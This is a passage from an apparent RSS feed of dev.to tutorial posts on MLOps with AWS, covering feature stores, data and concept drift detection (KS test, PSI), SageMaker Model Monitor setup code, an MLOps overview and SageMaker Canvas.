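&lt;p&gt;To make these concepts concrete, here is a toy in-memory sketch (not the SageMaker API; the customer_id / avg_basket schema is made up): records accumulate in an offline-store-style history, while an online-store-style lookup returns only the latest record per identifier, picked by event time.&lt;/p&gt;

```python
from collections import defaultdict

# record identifier value -> full history of records (offline-store style)
offline_store = defaultdict(list)

def put_record(record):
    """Append a record; identifier plus event_time identifies it uniquely."""
    offline_store[record["customer_id"]].append(record)

def get_latest(customer_id):
    """Online-store style lookup: the freshest record for this identifier."""
    history = offline_store[customer_id]
    return max(history, key=lambda r: r["event_time"])

put_record({"customer_id": "c1", "avg_basket": 31.5, "event_time": 100})
put_record({"customer_id": "c1", "avg_basket": 44.0, "event_time": 200})

print(get_latest("c1")["avg_basket"])
# 44.0
```

&lt;p&gt;SageMaker Feature Store does the real version of this for you: the offline store keeps the full history in S3, and the online store serves the latest record with low latency.&lt;/p&gt;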

&lt;p&gt;Now let's see how to work with feature stores in AWS.&lt;br&gt;
This video shows the main idea of using the feature store after preprocessing with AWS Data Wrangler: the flow from raw data, to analyzing and preprocessing it with Data Wrangler, to creating a feature store from the data-flow pipeline.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/mrHSmRyjfeg"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;Now let's see how we can deal with data drift,&lt;br&gt;
but first let's understand what drift is.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo55qhxsyivr9cjtqyw9b.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo55qhxsyivr9cjtqyw9b.jpeg" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's first ask ourselves: if the deployed model is static, with all its code and artifacts, what makes things break, and why does model accuracy degrade over time?&lt;/p&gt;

&lt;p&gt;In any system, the input always needs to be checked and validated; in ML, the input must be checked for drift and security issues.&lt;/p&gt;

&lt;p&gt;So what can happen to the data that makes things not work as they should?&lt;/p&gt;

&lt;p&gt;Data drift happens when the distribution of the data changes: a change in clothing trends and fashions that affects your clothes recommender system, changes in a country's economy and salaries that affect house prices, or a CCTV system where some faulty cameras send a damaged stream, or new cameras arrive with different video formats or output ranges.&lt;/p&gt;

&lt;p&gt;To make things more concrete, we have:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Concept drift is a type of model drift where the relationship, the mapping from x to y, has changed. An example is an ML-based WAF where new attacks emerge that the previous patterns can no longer detect: what the model knows as an attack has changed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Data drift involves changes in the data distribution: the relation of x to y is still valid, but something has changed the distribution, such as a natural change in temperature, new clothing trends, or changes in customer preference.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Upstream data changes refer to changes in the data pipeline, such as a CCTV system where faulty cameras send damaged streams.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;so now how to detect these drifts ???&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Note that not all drift can be detected automatically; many cases need a human in the loop.&lt;br&gt;
But generally, it is all about capturing model performance decay, if we can.&lt;/p&gt;

&lt;p&gt;If possible, we compare model accuracy against some ground truth.&lt;br&gt;
For tasks where ground truth is not available, there are other common methods to check for drift.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Kolmogorov-Smirnov test: we compare the cumulative distributions of two datasets; if the two distributions are not identical, we have data drift.&lt;br&gt;
For more, refer to&lt;br&gt;
&lt;a href="https://www.sciencedirect.com/topics/engineering/kolmogorov-smirnov" rel="noopener noreferrer"&gt;https://www.sciencedirect.com/topics/engineering/kolmogorov-smirnov&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Population stability index (PSI): it measures how much a variable's distribution has shifted over time.&lt;br&gt;
When we have:&lt;br&gt;
PSI &amp;lt; 0.10 means “little change”.&lt;br&gt;
0.10 &amp;lt; PSI &amp;lt; 0.25 means “moderate change”.&lt;br&gt;
PSI &amp;gt; 0.25 means “significant change, action required”.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;for more refer to  &lt;a href="https://www.risk.net/journal-of-risk-model-validation/7725371/statistical-properties-of-the-population-stability-index" rel="noopener noreferrer"&gt;https://www.risk.net/journal-of-risk-model-validation/7725371/statistical-properties-of-the-population-stability-index&lt;/a&gt;&lt;/p&gt;
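&lt;p&gt;Both checks are easy to sketch in plain Python (a minimal illustration over made-up histogram bin counts, not production code):&lt;/p&gt;

```python
import math

def ks_statistic(counts_a, counts_b):
    """Kolmogorov-Smirnov statistic: the largest gap between the two
    empirical cumulative distributions built from matching bin counts."""
    tot_a, tot_b = sum(counts_a), sum(counts_b)
    cdf_a = cdf_b = gap = 0.0
    for a, b in zip(counts_a, counts_b):
        cdf_a += a / tot_a
        cdf_b += b / tot_b
        gap = max(gap, abs(cdf_a - cdf_b))
    return gap

def psi(expected_counts, actual_counts, eps=1e-4):
    """Population stability index over matching bins; eps keeps an
    empty bin from producing log(0)."""
    tot_e, tot_a = sum(expected_counts), sum(actual_counts)
    total = 0.0
    for e, a in zip(expected_counts, actual_counts):
        pe = max(e / tot_e, eps)
        pa = max(a / tot_a, eps)
        total += (pa - pe) * math.log(pa / pe)
    return total

baseline = [20, 30, 30, 20]  # bin counts from the training data
same = [22, 28, 31, 19]      # new data, roughly the same shape
shifted = [5, 10, 35, 50]    # new data, clearly shifted

print(round(psi(baseline, same), 3))        # small PSI: "little change"
print(round(psi(baseline, shifted), 3))     # large PSI: "action required"
print(round(ks_statistic(baseline, shifted), 3))  # max gap between the CDFs
```

&lt;p&gt;With the thresholds above, the first comparison falls under 0.10 ("little change"), while the shifted one lands well above 0.25, which would trigger action.&lt;/p&gt;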

&lt;p&gt;Now let's get back to Amazon SageMaker Model Monitor and how it can help us here.&lt;/p&gt;

&lt;p&gt;It can monitor drift in data quality, drift in model quality metrics, bias in your model's predictions, and drift in feature attribution.&lt;/p&gt;

&lt;p&gt;Let's take data quality as an example.&lt;br&gt;
The idea is that we create a baseline that SageMaker compares new data against, using rules that help detect drift.&lt;br&gt;
The steps are as follows.&lt;/p&gt;

&lt;p&gt;First, you must enable data capture for your model when it is deployed for inference.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sagemaker.model_monitor import DataCaptureConfig

# set the data capture configuration
capture_config=DataCaptureConfig(
                        enable_capture = True,
                        sampling_percentage=100,
                        destination_s3_uri=s3_capture_path)

# add the config to your model deployment
predictor = model.deploy(initial_instance_count=1,
                instance_type='ml.m4.xlarge',
                endpoint_name='endpoint name',
                data_capture_config=capture_config)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, we must create a baseline from the main data, giving us baseline statistical calculations so we can tell when new data diverges from it.&lt;/p&gt;

&lt;p&gt;An example of creating the baseline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sagemaker.model_monitor import DefaultModelMonitor
from sagemaker.model_monitor.dataset_format import DatasetFormat

data_monitor = DefaultModelMonitor(
    role=role,
    instance_count=1,
    instance_type='ml.m5.xlarge',
    volume_size_in_gb=20,
    max_runtime_in_seconds=3600,
)

data_monitor.suggest_baseline(
    baseline_dataset=baseline_maindata_uri,
    dataset_format=DatasetFormat.csv(header=True),
    output_s3_uri=baseline_result,
    wait=True
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;for more please check out &lt;a href="https://docs.aws.amazon.com/sagemaker/latest/dg/model-monitor.html" rel="noopener noreferrer"&gt;https://docs.aws.amazon.com/sagemaker/latest/dg/model-monitor.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we have reached the end of this part; the next part will cover the remaining items in the visibility list. See you next time!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;note  :&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Some of you will say that, per AWS, 'Security is job zero', and of course it is; but according to the principle of least privilege, our responsibility in "MLOps using AWS" is to secure the code, models, and data.&lt;/p&gt;

&lt;p&gt;And as you can see, visibility is the enabler that lets us do the security work:&lt;br&gt;
1- code security checks: enabled by the code-sharing and tracking methodology that comes with visibility over code&lt;br&gt;
2- pre-checks for ML and data attacks (done via visibility over training plus visibility over data); this happens before we go live, since with visibility over model training we can attack the model ourselves while we train it.&lt;/p&gt;

&lt;p&gt;You can't secure a model without training it, because before training there is no model to attack, and before getting data you can't build a model to secure.&lt;br&gt;
Refer to these links to learn more about the attack layers of ML models:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://venturebeat.com/2021/05/29/adversarial-attacks-in-machine-learning-what-they-are-and-how-to-stop-them/" rel="noopener noreferrer"&gt;https://venturebeat.com/2021/05/29/adversarial-attacks-in-machine-learning-what-they-are-and-how-to-stop-them/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://openai.com/blog/adversarial-example-research/" rel="noopener noreferrer"&gt;https://openai.com/blog/adversarial-example-research/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://persagen.com/files/misc/goodfellow2017attacking.pdf" rel="noopener noreferrer"&gt;https://persagen.com/files/misc/goodfellow2017attacking.pdf&lt;/a&gt;&lt;br&gt;
&lt;a href="https://arxiv.org/abs/1705.00564" rel="noopener noreferrer"&gt;https://arxiv.org/abs/1705.00564&lt;/a&gt;&lt;br&gt;
&lt;a href="https://ieeexplore.ieee.org/abstract/document/9089095" rel="noopener noreferrer"&gt;https://ieeexplore.ieee.org/abstract/document/9089095&lt;/a&gt;&lt;br&gt;
&lt;a href="https://ieeexplore.ieee.org/abstract/document/6868201" rel="noopener noreferrer"&gt;https://ieeexplore.ieee.org/abstract/document/6868201&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;3- post-checks and in-flight checks (visibility over inference, visibility over activities, and data visibility).&lt;/p&gt;

&lt;p&gt;Finally, MLOps work must be integrated with the company's other teams; it does not replace them. We are here to integrate with their work.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>machinelearning</category>
    </item>
    <item>
      <title>MLOps journey with AWS - part 1 (helicopter view)</title>
      <dc:creator>almamon rasool abdali</dc:creator>
      <pubDate>Wed, 08 Dec 2021 08:16:10 +0000</pubDate>
      <link>https://dev.to/aws-builders/mlops-journey-with-aws-part-1-helicopter-view-3gn1</link>
      <guid>https://dev.to/aws-builders/mlops-journey-with-aws-part-1-helicopter-view-3gn1</guid>
      <description>&lt;p&gt;In this series of posts, we are going to start our journey into building MLOps culture foundations, and we will see how AWS services can help us productize our ML projects.&lt;br&gt;
Since this is the first article, I want to set the foundations and give a full view of the tools and technology we need on our journey toward end-to-end CI/CD/CT pipelines for ML projects.&lt;/p&gt;

&lt;p&gt;First, let's take a closer look at a general ML/data project life cycle.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fmamonrasool.com%2Fml-life.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fmamonrasool.com%2Fml-life.png" alt="ml projects life cycle" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;as you can see there are 4 main phases :&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;phase-1: gathering, ingestion, extraction of data &lt;/p&gt;

&lt;p&gt;phase-2: data exploring, understanding, cleaning, transforming, and pre-processing (I put these in one phase because the more you understand the data, the better you can pre-process and feature-engineer it)&lt;/p&gt;

&lt;p&gt;phase-3: modeling ( training and validation )&lt;/p&gt;

&lt;p&gt;phase-4: serving &lt;/p&gt;

&lt;p&gt;Based on the above, here is a simple ML project story:&lt;br&gt;
the team: Ali is a data scientist, Jack is an ML researcher, Mamon is an ML engineer.&lt;br&gt;
Ali gathered some data, explored it, did cleaning, preprocessing, and feature engineering, and delivered the result to Jack.&lt;br&gt;
Jack split the data, did modeling, training, and benchmarking, and delivered a trained model with its artifacts to Mamon.&lt;br&gt;
Mamon validated the model, built the serving service, and pushed the model to production.&lt;/p&gt;

&lt;p&gt;Now, what is wrong with the above lifecycle?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm2ftvhozblpwh8vxn0pu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm2ftvhozblpwh8vxn0pu.png" alt="meme ml projects in reality " width="800" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The above is not a production-ready solution!&lt;br&gt;
Here are some notes on why not:&lt;/p&gt;

&lt;p&gt;1- it is inefficient and not scalable&lt;br&gt;
2- it does not take data drift into account, and there is no monitoring or clear visibility of the process from data to modeling&lt;br&gt;
3- there is no integration with the software team that will consume and use the ML service&lt;br&gt;
4- there is a lot of manual delivery and hand-off friction between the processes&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But wait a second, what do you mean by drift?!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv27mq6c1pndgx9y80s2s.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv27mq6c1pndgx9y80s2s.jpg" alt="ml models need to adopts  to changes and drifts" width="500" height="375"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In practice, models often fail to adapt to changes in the environment or in the data; or sometimes, for whatever reason, we want to retrain, re-finetune, or redeploy models to adapt to changes. So we need a monitoring phase, a retraining pipeline, and a deployment pipeline with rollout strategies, so we can respond quickly to any kind of data or model drift.&lt;/p&gt;

&lt;p&gt;For brevity I will give the two main types, but there are others:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Data drift can happen when the data distribution changes from the distribution the model was trained on; depending on that change and the new patterns, model accuracy and performance will decrease.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;another type of drift is concept drift, which is when the relationship between the features and the label y changes&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;this topic is very use-case dependent: the monitoring frequency depends on the nature of the application, and the trigger depends on whether the quality target can be measured without a human in the loop. Don't worry, I will write a dedicated article covering this topic in more detail, including how to handle it using AWS.&lt;/p&gt;

&lt;p&gt;in a few words: either new trends and patterns have appeared that we need our model to catch up with, or the whole hypothesis has changed and we need to re-architect the model or models.&lt;/p&gt;

&lt;p&gt;so how can MLOps help the above small team if it wants to scale and increase productivity while following best practices?&lt;/p&gt;
&lt;h1&gt;
  
  
  What is MLOps?
&lt;/h1&gt;

&lt;p&gt;it is an engineering culture and practice that unifies ML system development (ML Dev) and ML system operation (Ops). With it, we want to increase visibility, reduce manual steps, improve team collaboration, and increase the speed of both rolling out changes and responding to them.&lt;br&gt;
This means automation and monitoring at all steps of ML system construction, including integration, testing, releasing, deployment, and infrastructure management.&lt;/p&gt;
&lt;h1&gt;
  
  
  Why MLOps and not DevOps (Difference Between MLOps &amp;amp; DevOps)
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flg7suvtdfzm4nzeuxrql.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flg7suvtdfzm4nzeuxrql.jpg" alt="meme data drift in ml" width="500" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;the nature of the projects and the teams involved in each of the above (MLOps, DevOps) creates a need to extend the ideas, vision, and tools of DevOps to fit ML / data projects.&lt;/p&gt;

&lt;p&gt;1- The team in ML projects usually includes data scientists or ML researchers; these members might not be experienced software engineers who can build production-class services.&lt;/p&gt;

&lt;p&gt;2- ML is experimental. We need to track experiments and maintain reproducibility while maximizing code reusability.&lt;/p&gt;

&lt;p&gt;3- Testing an ML system needs data validation, trained model evaluation, and model validation.&lt;/p&gt;

&lt;p&gt;4- ML models can suffer reduced performance not only because of problems in the code, but also due to drift (as mentioned above).&lt;/p&gt;

&lt;p&gt;now, what kind of extensions does CI/CD need to fit our needs for MLOps?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjsy35obbakggznoficlj.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjsy35obbakggznoficlj.jpeg" alt="meme productizing   ml projects " width="600" height="338"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Continuous Integration (CI): extends testing and validating code and components with testing and validating data, data schemas, and models.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Continuous Delivery (CD): extends service packaging with an ML training pipeline that automatically deploys another service, the model prediction service.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Continuous Training (CT): automatically retrains ML models for re-deployment (a property unique to ML systems). Keep in mind that re-training triggers fire for specific reasons and are not 100% automatic; in many cases a human in the loop decides on such triggers, so it is a case-by-case approach, but you must have a training pipeline with triggers ready.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Continuous Monitoring (CM): monitoring production data and model performance in terms of business metrics.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
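&lt;p&gt;as a toy illustration of what a CT trigger policy can look like (the function name and thresholds here are made up for the sketch, not from any framework):&lt;/p&gt;

```python
def should_retrain(baseline_accuracy, live_accuracy, drift_score,
                   max_accuracy_drop=0.05, max_drift=0.2):
    """Decide whether to kick off the re-training pipeline.
    Returns (trigger, reason); in many real setups some reasons are
    routed to a human reviewer instead of firing automatically."""
    if live_accuracy < baseline_accuracy - max_accuracy_drop:
        return True, "model decay: live accuracy dropped below tolerance"
    if drift_score > max_drift:
        return True, "data drift: input distribution changed"
    return False, "healthy"

print(should_retrain(0.92, 0.91, drift_score=0.05))  # (False, 'healthy')
print(should_retrain(0.92, 0.80, drift_score=0.05))  # decay -> re-train
print(should_retrain(0.92, 0.91, drift_score=0.40))  # drift -> re-train
```

&lt;p&gt;the point is that the decision logic is explicit and versioned, instead of someone eyeballing a dashboard and re-running a notebook.&lt;/p&gt;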

&lt;p&gt;&lt;strong&gt;some goals we want to achieve when applying MLOps&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;1- team collaboration and easy tracking and reproducing of (code, data, models)&lt;br&gt;
2- easy sharing of preprocessed data across teams, projects, or even between data channels like test and train&lt;br&gt;
3- good visibility and monitoring along the whole path (from data to serving, and even feedback from the end client of the final software)&lt;br&gt;
4- easy decision-making and triggering for any part, such as triggering re-training or re-processing&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;tools and tech to achieve some or all of the above goals&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;1- Feature store: this automates some of Ali's work (preprocessing and feature engineering).&lt;br&gt;
It is a single source of truth to store, retrieve, remove, track, share, discover, and control access to features,&lt;br&gt;
and you can use AWS SageMaker Feature Store for that.&lt;/p&gt;
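&lt;p&gt;to show the idea (this is a toy in-memory stand-in, not the real SageMaker Feature Store API): one place where Ali writes features once, and both training and serving read the exact same values back:&lt;/p&gt;

```python
import time

class TinyFeatureStore:
    """Toy stand-in for a feature store: a single source of truth
    for features, shared between training and serving."""

    def __init__(self):
        self._groups = {}

    def put(self, group, entity_id, features):
        # writes are timestamped so consumers can reason about freshness
        self._groups.setdefault(group, {})[entity_id] = {
            "features": dict(features),
            "event_time": time.time(),
        }

    def get(self, group, entity_id):
        return self._groups[group][entity_id]["features"]

store = TinyFeatureStore()
store.put("customers", "c-42", {"avg_basket": 31.5, "visits_30d": 7})

# the same features are served to the training job and the live endpoint
print(store.get("customers", "c-42"))
```

&lt;p&gt;a managed feature store adds what this toy skips: persistence, access control, discovery, and point-in-time (time-travel) reads.&lt;/p&gt;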

&lt;p&gt;2- Experiment tracking and model registry: this helps Jack with his experiments and helps Mamon find the right model when pushing to production; here we can use the AWS SageMaker Model Registry.&lt;/p&gt;
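&lt;p&gt;a tiny sketch of the idea behind experiment tracking plus a registry (plain dictionaries here, where SageMaker gives you managed services; the run values are invented):&lt;/p&gt;

```python
# log every experiment run with its parameters and validation metric
runs = []

def log_run(params, val_accuracy):
    runs.append({"params": params, "val_accuracy": val_accuracy})

log_run({"lr": 0.1,  "depth": 4}, 0.84)
log_run({"lr": 0.01, "depth": 6}, 0.89)
log_run({"lr": 0.01, "depth": 8}, 0.87)

# "registering" the best run marks it as the only candidate
# the serving pipeline is allowed to pick up
registry = {"churn-model": max(runs, key=lambda r: r["val_accuracy"])}
print(registry["churn-model"]["params"])  # {'lr': 0.01, 'depth': 6}
```

&lt;p&gt;with this in place Jack can always answer "which parameters produced the model in production?", and Mamon never guesses which artifact to deploy.&lt;/p&gt;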

&lt;p&gt;3- Training pipeline: Jack does not need to re-execute the training phase by hand; if model decay happens, a trigger can start re-training using the training pipeline Jack defined. You can use AWS SageMaker Pipelines, AWS Lambda, TFX, TorchX, or Kubeflow.&lt;/p&gt;

&lt;p&gt;4- Serving pipeline: based on the production strategy, this pipeline helps Mamon with everything from checking which model to validate to re-packaging and re-deploying the serving services; again AWS SageMaker Pipelines, AWS Lambda, TFX, TorchX, or Kubeflow.&lt;/p&gt;

&lt;p&gt;5- Data and model monitoring for drift and decay, with triggers: here we can use AWS SageMaker Pipelines with model monitoring.&lt;/p&gt;

&lt;p&gt;6- When we talk about pipelines we also need orchestration and automation; AWS SageMaker Pipelines manages that for you behind the scenes.&lt;/p&gt;
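&lt;p&gt;what an orchestrator automates, hand-rolled in a few lines (the step names and quality bar are made up for this sketch): run named steps in order and stop if a quality gate fails:&lt;/p&gt;

```python
def validate_data(ctx):
    ctx["rows"] = 1000          # pretend we validated 1000 clean rows
    return ctx

def train(ctx):
    ctx["val_accuracy"] = 0.91  # pretend training produced this score
    return ctx

def quality_gate(ctx):
    if ctx["val_accuracy"] < 0.85:
        raise RuntimeError("model below quality bar, stop the pipeline")
    return ctx

def register_model(ctx):
    ctx["registered"] = True
    return ctx

pipeline = [validate_data, train, quality_gate, register_model]

ctx = {}
for step in pipeline:
    ctx = step(ctx)  # a real orchestrator also retries, logs, parallelizes

print(ctx["registered"])  # True
```

&lt;p&gt;a managed orchestrator replaces this loop with a dependency graph, retries, caching, and a UI, but the mental model is the same.&lt;/p&gt;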
&lt;h3&gt;
  
  
  How we can achieve all of the above in AWS: a quick video
&lt;/h3&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/in013BlgsAc"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

</description>
      <category>machinelearning</category>
      <category>cloudskills</category>
      <category>python</category>
      <category>mlops</category>
    </item>
    <item>
      <title>No code ML with Amazon SageMaker Canvas</title>
      <dc:creator>almamon rasool abdali</dc:creator>
      <pubDate>Wed, 01 Dec 2021 10:50:06 +0000</pubDate>
      <link>https://dev.to/aws-builders/no-code-ml-with-amazon-sagemaker-canvas-363l</link>
      <guid>https://dev.to/aws-builders/no-code-ml-with-amazon-sagemaker-canvas-363l</guid>
<description>&lt;p&gt;&lt;strong&gt;No code ML&lt;/strong&gt; is an approach to building ML-based models without doing any heavy data work or ML coding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No code ML platforms&lt;/strong&gt; are designed for business users or analysts who have domain knowledge of the overall workflow but little or no coding experience.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AWS SageMaker Canvas&lt;/strong&gt; is a no code ML platform.&lt;/p&gt;

&lt;p&gt;before you go to AWS SageMaker Canvas, make sure you know at a high level what the ML workflow looks like&lt;/p&gt;

&lt;p&gt;there are 4 main phases:&lt;br&gt;
&lt;strong&gt;phase-1 :&lt;/strong&gt; gathering, ingestion, and extraction of data&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;phase-2 :&lt;/strong&gt; data exploring, understanding, cleaning, transforming, and pre-processing (why I put these in one phase: the more you understand the data, the better you can pre-process and feature engineer it)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;phase-3 :&lt;/strong&gt; modeling ( training and validation )&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;phase-4 :&lt;/strong&gt; serving and monitoring&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KGIYNsEk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1eet2xkm6hiuwgmjkca.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KGIYNsEk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1eet2xkm6hiuwgmjkca.jpg" alt="Image description" width="880" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;according to the above, let's see a simple ML project story&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;a simple ML project story. Your team: Jason is a data engineer, Ali is a data scientist, Jack is an ML researcher, and Mamon is an ML engineer.&lt;br&gt;
Jason sets up a data pipeline that collects, stores, organizes, and catalogs the data, making it ready for others to consume. Ali gathers some data from the sources Jason already maintains, explores it, cleans it, does some preprocessing and feature engineering on it, and delivers it to Jack.&lt;/p&gt;

&lt;p&gt;Jack splits the data, does the modeling, training, and benchmarking, and then delivers a trained model with its artifacts to Mamon.&lt;/p&gt;

&lt;p&gt;Mamon validates the model, builds the serving service, and pushes the model to production.&lt;/p&gt;

&lt;p&gt;now imagine that with AWS SageMaker Canvas you can do Ali's and Jack's work with simple clicks and no deep coding knowledge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;let's see how&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/m6VBT0-m0SY"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

</description>
      <category>machinelearning</category>
      <category>aws</category>
    </item>
  </channel>
</rss>
